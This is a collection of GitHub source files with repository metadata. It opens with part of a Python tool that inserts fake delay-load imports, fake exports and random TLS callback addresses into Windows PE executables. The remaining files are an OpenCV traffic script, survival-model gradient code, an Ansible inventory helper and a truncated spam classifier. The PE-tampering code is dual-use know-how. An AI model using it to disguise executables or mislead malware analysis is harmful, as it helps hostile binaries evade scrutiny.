it does not depend on anything\n dl_iat += [[]]\n while i < num_functions_per_dll:\n dl_iat[x] += [self.pe.OPTIONAL_HEADER.ImageBase + self.pe.sections[0].VirtualAddress + i * 0x10]\n master_byte_array += pack(\"@I\", dl_iat[x][i])\n i += 1\n # do not forget the null terminator\n dl_iat[x] += [0]\n master_byte_array += pack(\"@I\", 0)\n\n dl_idt[x].pINT = offset_after_dlidt + len(master_byte_array)\n\n i = 0\n offset_after_dlint = dl_idt[x].pINT + 4 * (\n num_functions_per_dll + 1)\n dl_int += [[]]\n while i < num_functions_per_dll:\n dl_int[x] += [offset_after_dlint]\n i += 1\n dl_int[x] += [0]\n # NOTE the 2-byte RVA alignment was taken from mspaint\n i = 0\n dl_hint_names += [[]]\n while i < num_functions_per_dll:\n dl_int[x][i] += len(dl_hint_names[x])\n dl_hint_names[x] += ['\\x00', '\\x00'] # zero hint word\n random_func = random_functions_list[x][randint(0, len(random_functions_list[x]) - 1)]\n dl_hint_names[x] += list(random_func)\n dl_hint_names[x] += ['\\x00'] # null terminator (FIXME: confirm this is necessary?)\n if (len(random_func) + 1) % 2:\n dl_hint_names[x] += ['\\x00', '\\x00', '\\x00']\n i += 1\n\n i = 0\n for num in dl_int[x]:\n # FIXME: this could be the source for some 64 bit incompat. try condition @Q later\n master_byte_array += pack(\"@I\", num)\n master_byte_array += dl_hint_names[x]\n x += 1\n\n # finish filling in the descriptor table\n dlidt_bytes = []\n i = 0\n while i <= num_delay_load_entries:\n d = dl_idt[i]\n dlidt_bytes += list(d.__pack__())\n i += 1\n\n file_data_len_before_inserts = len(file_data)\n file_data += dlidt_bytes\n\n file_data += master_byte_array\n\n total_section_size = len(dlidt_bytes) + len(master_byte_array)\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n\n file_data += nop_str\n\n # insert the section header\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = b'.dload'\n tmp_section.Misc_VirtualSize = total_section_size\n\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n self.pe.OPTIONAL_HEADER.SizeOfImage = (total_delay_load_data_size_for_everything + tmp_section.VirtualAddress)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[13].VirtualAddress = tmp_section.VirtualAddress\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[13].Size = len(dlidt_bytes)\n if self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[11].VirtualAddress:\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[11].VirtualAddress += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + 
self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n def create_exports(self, random_funcs_num, random_functions: list) -> bytes:\n \"\"\"\n Creates a new section with exports\n :param random_funcs_num: number of export functions\n :param random_functions: random function names\n :return: the same as the previous methods\n \"\"\"\n if not self.pe.is_dll():\n raise ValueError(\"if not self.pe.is_dll()\")\n\n file_data = list(self.pe.__data__)\n file_data_len_before_inserts = len(file_data)\n\n self.pe.FILE_HEADER.NumberOfSections += 1\n exported_func_names = []\n i = 0\n while i < random_funcs_num:\n index = randint(0, len(random_functions) - 1)\n while random_functions[index] in exported_func_names:\n index = randint(0, len(random_functions) - 1)\n exported_func_names.append(random_functions[index])\n i += 1\n\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n if existing_last_section_end_va % 0x1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n master_byte_array = []\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.NumberOfNames += random_funcs_num # TODO add in the existing entries\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.NumberOfFunctions += random_funcs_num\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfFunctions = existing_last_section_end_va\n\n # take the start of the .text section to make the addresses look more plausible\n text_start = self.pe.sections[0].VirtualAddress\n text_end = text_start + self.pe.sections[0].Misc_VirtualSize\n eat = []\n i = 0\n while i < random_funcs_num:\n eat += [randint(text_start, text_end)]\n # FIXME: this could be the source for some 64 bit incompat. 
\n master_byte_array += pack(\"@I\", eat[i])\n i += 1\n\n exported_func_names.sort()\n # export_names = []\n name_ordinals = []\n ENT = []\n offset = 0\n i = 0\n while i < random_funcs_num:\n name_ordinals += [i]\n ENT += [existing_last_section_end_va + len(master_byte_array)]\n master_byte_array += list(exported_func_names[i])\n master_byte_array += ['\\x00'] # don't forget the null terminator\n i += 1\n\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfNames = existing_last_section_end_va + len(master_byte_array)\n for num in ENT:\n # FIXME: here and below there may be incompatibilities with some x64 binaries\n master_byte_array += pack(\"@I\", num)\n self.pe.DIRECTORY_ENTRY_EXPORT.struct.AddressOfNameOrdinals = existing_last_section_end_va + len(\n master_byte_array)\n for num in name_ordinals:\n master_byte_array += pack(\"@H\", num)\n # write out all the data we have collected\n file_data += master_byte_array\n total_section_size = len(master_byte_array)\n\n # padding after the inserted data\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n file_data += nop_str\n\n # insert the section into the header in the standard way\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = b'.ebata'\n tmp_section.Misc_VirtualSize = total_section_size\n # align the data up to self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n # update the end-of-file bookkeeping\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n # insert the section\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n # padding\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n # update these just in case\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.VirtualAddress + tmp_section.Misc_VirtualSize)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n # update PointerToRawData\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n # update the structure offsets\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n\n\n def create_tls(self, random_callback_addresses: List[int]) -> bytes:\n \"\"\"\n Creates a new section with a TLS directory\n :param random_callback_addresses: random callback addresses for the structure\n :return: the new file contents as bytes\n \"\"\"\n file_data = list(self.pe.__data__)\n # reference point for PointerToRawData\n file_data_len_before_inserts = len(file_data)\n\n self.pe.FILE_HEADER.NumberOfSections += 1\n\n tls_dir = pefile.Structure(self.pe.__IMAGE_TLS_DIRECTORY_format__)\n
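# zero-fill the template so every TLS directory field starts cleared\n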
tls_dir.__unpack__(b\"\\0\" * tls_dir.sizeof())\n tmp_section = pefile.SectionStructure(self.pe.__IMAGE_SECTION_HEADER_format__, pe=self.pe)\n if not tmp_section:\n raise ValueError(\"failed to create a section header structure\")\n\n sect_hdr_size = self.pe.sections[0].sizeof()\n tmp_section.__unpack__(b'\\0' * sect_hdr_size)\n\n # get the VA at which the last section ends\n existing_last_section_end_va = self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize\n # round up to the nearest 0x1000\n if existing_last_section_end_va % 0x1000:\n existing_last_section_end_va += (0x1000 - existing_last_section_end_va % 0x1000)\n\n master_byte_array = []\n # place the callback table right after the TLS directory\n tls_dir.AddressOfCallBacks = self.pe.OPTIONAL_HEADER.ImageBase + existing_last_section_end_va + tls_dir.sizeof()\n\n i = 0\n while i < len(random_callback_addresses):\n # FIXME: this may break on some 64-bit binaries; try the \"@Q\" pack format later\n master_byte_array += pack(\"@I\", random_callback_addresses[i])\n i += 1\n\n file_data += list(tls_dir.__pack__())\n file_data += master_byte_array\n total_section_size = tls_dir.sizeof() + len(master_byte_array)\n\n\n nop_str = ['\\x90'] * (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n\n file_data += nop_str\n\n offset_after_sect_hdr = self.pe.sections[-1].get_file_offset() + sect_hdr_size\n\n tmp_section.set_file_offset(offset_after_sect_hdr)\n tmp_section.Name = b\".tls\"\n tmp_section.Misc_VirtualSize = total_section_size + 0x200\n\n\n tmp_section.SizeOfRawData = total_section_size + (\n self.pe.OPTIONAL_HEADER.FileAlignment - (total_section_size % self.pe.OPTIONAL_HEADER.FileAlignment))\n tmp_section.VirtualAddress = existing_last_section_end_va\n\n tmp_section.PointerToRawData = file_data_len_before_inserts + self.pe.OPTIONAL_HEADER.FileAlignment\n tmp_section.Characteristics = 0x40000040\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = list(tmp_section.__pack__())\n offset_after_sect_hdr += sect_hdr_size\n\n nop_str = ['\\x90'] * (self.pe.OPTIONAL_HEADER.FileAlignment - sect_hdr_size)\n\n file_data[offset_after_sect_hdr:offset_after_sect_hdr] = nop_str\n\n self.pe.OPTIONAL_HEADER.SizeOfImage = (tmp_section.VirtualAddress + tmp_section.Misc_VirtualSize)\n self.pe.OPTIONAL_HEADER.SizeOfHeaders += sect_hdr_size\n\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress = tmp_section.VirtualAddress\n self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size = tmp_section.Misc_VirtualSize\n\n for section in self.pe.sections:\n section.PointerToRawData += self.pe.OPTIONAL_HEADER.FileAlignment\n\n self.pe.OPTIONAL_HEADER.CheckSum = self.pe.generate_checksum()\n\n for structure in self.pe.__structures__:\n\n offset = structure.get_file_offset()\n if offset >= tmp_section.get_file_offset():\n structure.set_file_offset(offset + self.pe.OPTIONAL_HEADER.FileAlignment)\n\n offset = structure.get_file_offset()\n struct_data = list(structure.__pack__())\n file_data[offset:offset + len(struct_data)] = struct_data\n\n new_file_data: bytes = mixed_list_to_bytes(file_data)\n return new_file_data\n","repo_name":"fuunyaka/pebutcher","sub_path":"pebutcher/utils/peworker.py","file_name":"peworker.py","file_ext":"py","file_size_in_byte":27634,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31103034640","text":"import numpy as np\nimport cv2\nimport sys\n\n# cap = cv2.VideoCapture('2017_06_23_1430_Falen_Cigaren_mod_byen.mp4')
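\n# three sample traffic recordings; switch the active capture line to analyze a different clip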
\ncap = cv2.VideoCapture('2015_06_27_1630_Krydset_Motorvejsafkørsel_52.mp4') # 35 / 6 / 2\n# cap = cv2.VideoCapture('KrydsetFaaborgvejSanderumvej1.mp4')\n\ncv2.namedWindow(\"frame\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"TD\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"TD_thres\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg_thres\", cv2.WINDOW_NORMAL)\ncv2.namedWindow(\"avg_frame\", cv2.WINDOW_NORMAL)\n\ndef nothing(x):\n pass\n\ncv2.createTrackbar('threshold_TD','frame',0,255, nothing)\ncv2.createTrackbar('threshold_AVG','frame',0,255, nothing)\ncv2.createTrackbar('alpha','frame',0,100, nothing)\ncv2.createTrackbar('opening','frame',1,100, nothing)\ncv2.createTrackbar('closing','frame',1,100, nothing)\n\n# Init pos\ncv2.setTrackbarPos('threshold_TD', 'frame', 0) #38\ncv2.setTrackbarPos('threshold_AVG', 'frame', 0) #38\ncv2.setTrackbarPos('alpha', 'frame', 1)\ncv2.setTrackbarPos('opening', 'frame', 1)\ncv2.setTrackbarPos('closing', 'frame', 1)\n\n### Params ###\nstabilize = False\n\n### init Fast for image stabilization ###\norb = cv2.ORB_create()\nMIN_MATCH_COUNT = 10\n\n# FLANN parameters\nFLANN_INDEX_LSH = 6\nindex_params= dict(algorithm = FLANN_INDEX_LSH,\n table_number = 6, # 12\n key_size = 12, # 20\n multi_probe_level = 1) #2\nsearch_params = dict(checks=50) # or pass empty dictionary\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\n# initialize\nret, firstFrame = cap.read()\nfirstFrame = cv2.cvtColor(firstFrame, cv2.COLOR_BGR2GRAY)\nrefKP, refDes = orb.detectAndCompute(firstFrame, None) # reference keypoints/descriptors for the optional stabilization\navg = np.float32(firstFrame)\n\nprevFrame = firstFrame\n\nwhile cap.isOpened():\n ret, currFrame = cap.read()\n\n outFrame = currFrame\n currFrame = cv2.cvtColor(currFrame, cv2.COLOR_BGR2GRAY)\n\n # trackbars\n thrs_td = cv2.getTrackbarPos('threshold_TD', 'frame')\n thrs_avg = cv2.getTrackbarPos('threshold_AVG', 'frame')\n alpha = cv2.getTrackbarPos('alpha', 'frame')\n kernel_open = cv2.getTrackbarPos('opening','frame')\n kernel_close = cv2.getTrackbarPos('closing','frame')\n\n # Stabilize image #\n if stabilize:\n greyFrame = currFrame # currFrame is already grayscale at this point\n currKP, currDes = orb.detectAndCompute(greyFrame, None)\n # currKP, currDes = fast.detectAndCompute(greyFrame, None)\n\n #Match\n matches = flann.knnMatch(refDes, currDes, k=2)\n # Apply ratio test\n good = []\n for m_n in matches:\n if len(m_n) != 2:\n continue\n (m, n) = m_n\n if m.distance < 0.75 * n.distance:\n good.append(m)\n\n print(len(good))\n\n # perspective change\n if len(good) > MIN_MATCH_COUNT:\n\n src_pts = np.float32([refKP[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32([currKP[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n\n h, w = currFrame.shape\n currFrame = cv2.warpPerspective(currFrame, M, (w, h))\n\n # #TODO debug drawing FAST features\n # pts = np.float32([[0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n # dst = cv2.perspectiveTransform(pts, M)\n # flowFrame = cv2.polylines(currFrame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)\n else:\n print(\"Not enough matches are found - %d/%d\" % (len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n # blurFrame = cv2.blur(currFrame, (5, 5))\n\n # Running Average #\n # Implement running average and get mask from background\n cv2.accumulateWeighted(currFrame, avg, alpha/100)\n running_res = cv2.convertScaleAbs(avg)\n avg_frame = running_res\n\n # Subtract the running average from 
the current frame to isolate the moving parts\n running_res = cv2.absdiff(currFrame, running_res)\n _, running_res_thres = cv2.threshold(running_res, thrs_avg, 255, cv2.THRESH_BINARY)\n\n\n # Temporal difference #\n # Implement temporal difference and get mask\n diff_frame = cv2.absdiff(currFrame, prevFrame)\n _, diff_frame_thres = cv2.threshold(diff_frame, thrs_td, 255, cv2.THRESH_BINARY)\n\n # Logically AND the masks together #\n moving_objs = cv2.bitwise_and(running_res, diff_frame)\n bg_subtracted = cv2.bitwise_and(currFrame, currFrame, mask=diff_frame)\n\n # Morphology to remove noise #\n kernel_open = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_open,kernel_open))\n kernel_close = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (kernel_close,kernel_close))\n\n morphImg = cv2.morphologyEx(moving_objs, cv2.MORPH_OPEN, kernel_open)\n morphImg = cv2.morphologyEx(morphImg, cv2.MORPH_CLOSE, kernel_close)\n\n # Connected components to get moving objects #\n\n # # You need to choose 4 or 8 for connectivity type\n # connectivity = 4\n # # Perform the operation\n # output = cv2.connectedComponentsWithStats(morphImg, connectivity, cv2.CV_32S)\n # # Get the results\n # # The first cell is the number of labels\n # num_labels = output[0]\n # # The second cell is the label matrix\n # labels = output[1]\n # # The third cell is the stat matrix\n # stats = output[2]\n # # The fourth cell is the centroid matrix\n # centroids = output[3]\n #\n # for i in range(0, len(centroids)):\n # top = stats[i, cv2.CC_STAT_TOP]\n # left = stats[i, cv2.CC_STAT_LEFT]\n # width = stats[i, cv2.CC_STAT_WIDTH]\n # height = stats[i, cv2.CC_STAT_HEIGHT]\n #\n # if stats[i, cv2.CC_STAT_AREA] < cc_min: continue\n #\n # cv2.rectangle(outFrame, (left, top), (left + width, top + height), (0, 0, 255), 2)\n # cv2.rectangle(morphImg, (left, top), (left + width, top + height), (0, 0, 255), 2)\n #\n # # cv2.putText(currFrame, 'Car Detected', (left + width + 10, top + height), 0, 0.3, (0, 0, 255))\n\n prevFrame = currFrame\n\n cv2.imshow('frame', morphImg)\n cv2.imshow('avg', running_res)\n cv2.imshow('TD', diff_frame)\n cv2.imshow('TD_thres', diff_frame_thres)\n cv2.imshow('avg_thres', running_res_thres)\n cv2.imshow('avg_frame', avg_frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Crowdedlight/ROVI2","sub_path":"Excercises/Miniproject2/traffic_analyse_running_avg_temperal_diff.py","file_name":"traffic_analyse_running_avg_temperal_diff.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69944340626","text":"\"\"\"\nGRADIENT METHODS FOR MLL FITTING\n\"\"\"\n\n# External modules\nimport warnings\nimport numpy as np\n\n# Internal modules\nfrom paranet.utils import broadcast_dist, format_t_d_scale_shape, dist2idx\n\n# Suppress overflow warnings\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n\ndef log_lik(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES THE LOG-LIKELIHOOD\n\n Inputs\n ------\n t: A [n,k] or (n,) matrix/array of time-to-event values\n d: A [n,k] or (n,) matrix/array of censoring values (1=event, 0=right-censored)\n scale: See (SurvDists): equivalent to lambda\n shape: See (SurvDists): equivalent to alpha\n dist: A valid distribution (currently: exponential, weibull, or gompertz)\n\n Returns\n ------\n ll: A (k,) array of log-likelihoods\n \"\"\"\n # Note that this will broadcast t wide if k > 1
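\n # (each of the k columns is scored against its own scale/shape column)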
\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n ll_vec = np.zeros(k)\n # Calculate negative mean of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n ll_vec[i] = -np.mean(d_vec[:,i] * np.log(scale[:,i]) - scale[:,i]*t_vec[:,i], axis=0)\n if d == 'weibull':\n ll_vec[i] = -np.mean(d_vec[:,i]*(np.log(shape[:,i]*scale[:,i]) + (shape[:,i]-1)*np.log(t_vec[:,i])) - scale[:,i]*t_vec[:,i]**shape[:,i], axis=0)\n if d == 'gompertz':\n ll_vec[i] = -np.mean(d_vec[:,i]*(np.log(scale[:,i])+shape[:,i]*t_vec[:,i]) - scale[:,i]/shape[:,i]*(np.exp(shape[:,i]*t_vec[:,i])-1), axis=0)\n return ll_vec\n\n\ndef grad_ll(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATE THE GRADIENT FOR THE SHAPE AND SCALE PARAMETERS\n\n Inputs\n ------\n See log_lik\n\n Returns\n -------\n grad: A [p,k] matrix, where the first row corresponds to the shape parameter \n \"\"\"\n grad_alph = grad_ll_shape(t, d, scale, shape, dist)\n grad_lam = grad_ll_scale(t, d, scale, shape, dist)\n # Place shape/alpha in position zero\n grad = np.vstack([grad_alph, grad_lam])\n return grad\n\n\ndef grad_ll_scale(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES THE GRADIENT FOR THE SCALE PARAMETER\n\n Inputs\n ------\n See log_lik\n\n Returns\n -------\n dll: A (k,) array of gradients\n \"\"\"\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n dll_vec = np.zeros(k)\n # Calculate negative gradient of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - t_vec[:,i], axis=0)\n if d == 'weibull':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - t_vec[:,i]**shape[:,i], axis=0)\n if d == 'gompertz':\n dll_vec[i] = -np.mean(d_vec[:,i]/scale[:,i] - (np.exp(shape[:,i]*t_vec[:,i]) - 1)/shape[:,i], axis=0)\n return dll_vec\n\n\ndef grad_ll_shape(t:np.ndarray, d:np.ndarray, scale:np.ndarray, shape:np.ndarray or None, dist:str) -> np.ndarray:\n \"\"\"\n CALCULATES THE GRADIENT FOR THE SHAPE PARAMETER\n\n Inputs\n ------\n See log_lik\n\n Returns\n -------\n dll: A (k,) array of gradients\n \"\"\"\n t_vec, d_vec, scale, shape = format_t_d_scale_shape(t, d, scale, shape)\n k = scale.shape[1]\n dll_vec = np.zeros(k)\n # Calculate negative gradient of log-likelihood\n dist = broadcast_dist(dist, k)\n didx = dist2idx(dist)\n for d, i in didx.items():\n if d == 'exponential':\n dll_vec[i] = -np.repeat(0, len(i))\n if d == 'weibull':\n dll_vec[i] = -np.mean( d_vec[:,i]*(1/shape[:,i] + np.log(t_vec[:,i])) - scale[:,i]*t_vec[:,i]**shape[:,i]*np.log(t_vec[:,i]), axis=0)\n if d == 'gompertz':\n dll_vec[i] = -np.mean( d_vec[:,i]*t_vec[:,i] - (scale[:,i]/shape[:,i]**2)*(np.exp(shape[:,i]*t_vec[:,i])*(shape[:,i]*t_vec[:,i]-1) +1), axis=0)\n return dll_vec\n\n\n\n\n\n\n\n\n\n","repo_name":"ErikinBC/paranet","sub_path":"paranet/univariate/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17628316376","text":"# Ansible dynamic inventory\n# - Top-level: Holistic inventory with groups info and hosts\n# - hmap: ._meta.hostvars\n\nimport re\n\ninv = None\nhmap = None\n\ndef new(_inv):\n global hmap\n global inv\n inv = 
_inv\n hmap = hmap_get()\n\ndef hmap_get():\n if not inv: print(\"No inventory registered !!\"); exit(1)\n hmap = inv.get(\"_meta\", {}).get(\"hostvars\", {})\n return hmap\n\n# Init hostmap: add stuff, delete stuff (index stuff ?)\ndef hmap_init(hmap):\n # \n # Work on whole inv ? inv.get('_meta'). ...\n for hk in hmap.keys():\n hnode = hmap.get(hk)\n hnode[\"hname\"] = hk;\n #delete hnode \"metadata\", disks.shieldedInstanceInitialState\n # metadata has also cluster-name and cluster_name, cluster-location\n del hnode['metadata'] # hnode.pop(\"metadata\", None)\n hnode[\"region\"] = zone2reg( hnode[\"zone\"] ) # Add region implied by zone\n\n# Convert zone to implied parent region\ndef zone2reg(z):\n r = re.sub(r'-[a-z]$', '', z)\n return r\n\ndef hnode_get(n):\n if not isinstance(hmap, dict): print(\"hmap (in module) is not dict\"); exit(1)\n h = hmap.get(n, None)\n # if not h: \n return h\n\n# Query disk properties like 'deviceName' or 'diskSizeGb'\n# Note: Ansible inventory does not have disk 'Name' (gcloud output does)\ndef hnode_disk_prop(h, prop):\n d = h.get(\"disks\", [None])[0]\n if not d: print(\"No disk for host \"+h); return None\n return d.get(prop)\n\n# Get First Net-if (networkInterfaces[0])\ndef netif(h, **kwargs):\n nifarr = h.get(\"networkInterfaces\")\n if not nifarr: return None\n if not nifarr[0]: return None\n if kwargs.get(\"ipaddr\"): return nifarr[0].get(\"networkIP\")\n if not isinstance(nifarr[0], dict): return None\n return nifarr[0]\n","repo_name":"ohollmen/dputpy","sub_path":"ansdi.py","file_name":"ansdi.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10794664586","text":"from dataclasses import make_dataclass\nfrom typing import Any, Dict, List, Set, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\n\nMetricValue = Union[\n Any, List[Any], Set[Any], Tuple[Any, ...], pd.DataFrame, pd.Series, np.ndarray\n]\nMetricValues = Union[\n MetricValue, List[MetricValue], Set[MetricValue], Tuple[MetricValue, ...]\n]\nMetricComputationDetails = Dict[str, Any]\nMetricComputationResult = make_dataclass(\n \"MetricComputationResult\", [\"attributed_resolved_metrics\", \"details\"]\n)\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/rule_based_profiler/types/metric_computation_result.py","file_name":"metric_computation_result.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"13451399901","text":"#!/usr/bin/env python3\n\n# Author: Patrik Segedy \n# File: detector.py\n# Description: Simple antispam using machine learning for BIS class\n\nimport os\nimport sys\nimport email.parser\nimport email.message\nimport email.policy\nimport html2text\nfrom pandas import DataFrame\nimport numpy\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals import joblib\n\n\nDEFAULT_CHARSET = 'latin-1'\n# http://www2.aueb.gr/users/ion/data/enron-spam/\n# + private e-mails\nDATASET = [\n ('ham/beck-s', False),\n ('ham/kaminski-v', False),\n ('priklady/emaily', False),\n ('ham/Inbox_20171208-1919', False),\n ('ham/farmer-d', False),\n # ('ham/kitchen-l', False),\n # ('ham/lokay-m', False),\n # ('ham/williams-w3', False),\n 
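# spam corpora follow; the second tuple element marks is_spam\n 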
# ('spam/GP', True),\n # ('spam/BG', True),\n ('spam/SH', True),\n ('priklady/spamy', True)\n]\n\n\ndef read_dataset(path):\n \"\"\"Read dataset and yield file path and content of email body\"\"\"\n for root, dirs, files in os.walk(path):\n for file in files:\n file_path = (os.path.join(root, file))\n with open(file_path, 'rb') as f:\n try:\n msg = email.message_from_binary_file(f, policy=email.policy.default)\n try:\n msg_body = msg.get_body(preferencelist=('html', 'plain'))\n msg_body_payload = msg_body.get_payload(decode=True)\n charset = msg_body.get_content_charset(DEFAULT_CHARSET)\n except:\n msg_body_payload = msg.get_payload(decode=True)\n charset = msg.get_content_charset(DEFAULT_CHARSET)\n # try to decode payload\n try:\n msg_payload_decoded = msg_body_payload.decode(charset)\n except:\n charset = DEFAULT_CHARSET\n msg_payload_decoded = msg_body_payload.decode(charset)\n\n lines = [html2text.html2text(line).strip() for line in msg_payload_decoded.splitlines() if html2text.html2text(line).strip()]\n except:\n lines = []\n\n yield file_path, \"\".join(lines)\n\n\ndef make_data_frame(path, is_spam):\n \"\"\"Construct DataFrame from email body and class (spam/ham)\"\"\"\n rows = []\n index = []\n for file, content in read_dataset(path):\n rows.append({'content': content, 'class': is_spam})\n index.append(file)\n\n data_frame = DataFrame(rows, index=index)\n return data_frame\n\n\ndef train_model():\n # add data to dataframe\n data = DataFrame({'content': [], 'class': []})\n for path, is_spam in DATASET:\n data = data.append(make_data_frame(path, is_spam))\n\n # shuffle dataset\n data = data.reindex(numpy.random.permutation(data.index))\n\n # count number of words, frequentions, and classify\n pipeline = Pipeline([\n ('count_vectorizer', CountVectorizer(ngram_range=(1, 